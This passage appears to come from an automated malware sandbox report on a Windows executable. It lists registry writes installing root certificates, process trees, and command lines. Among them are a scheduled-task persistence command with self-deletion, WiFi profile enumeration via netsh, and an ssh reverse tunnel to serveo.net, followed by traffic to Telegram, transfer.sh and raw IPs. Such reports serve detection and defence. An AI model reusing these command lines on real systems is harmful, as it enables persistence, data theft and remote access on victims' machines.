63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 2408 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 2408 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 2128 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2128 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2128 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2128 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2128 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2128 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2128 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2128 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2128 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2600 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 544 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 544 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 544 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 544 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 544 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 544 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 544 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 544 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 544 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2600 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 1856 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1856 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1856 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1856 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1856 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1856 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1856 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1856 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1856 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 1444 wrote to memory of 2716 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 1444 wrote to memory of 2716 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 1444 wrote to memory of 2716 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2716 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 1980 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1980 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1980 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1980 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1980 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1980 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1980 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1980 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1980 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2716 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net

C:\Windows\system32\taskeng.exe

taskeng.exe {79F8C408-9CC4-42FD-8206-69DEF0935CA1} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

Network

Country Destination Domain Proto
N/A 127.0.0.1:2598 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 ip-api.com udp
US 140.82.113.3:443 github.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.70:80 apps.identrust.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
DE 159.89.214.31:22 serveo.net tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:2598 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
DE 144.76.136.153:443 transfer.sh tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp

Files

memory/2408-0-0x0000000000090000-0x00000000000F2000-memory.dmp

memory/2408-1-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

memory/2408-2-0x00000000004D0000-0x0000000000550000-memory.dmp

memory/2408-5-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2600-9-0x0000000000F20000-0x0000000000F82000-memory.dmp

memory/2600-10-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

memory/2600-11-0x000000001AF70000-0x000000001AFF0000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
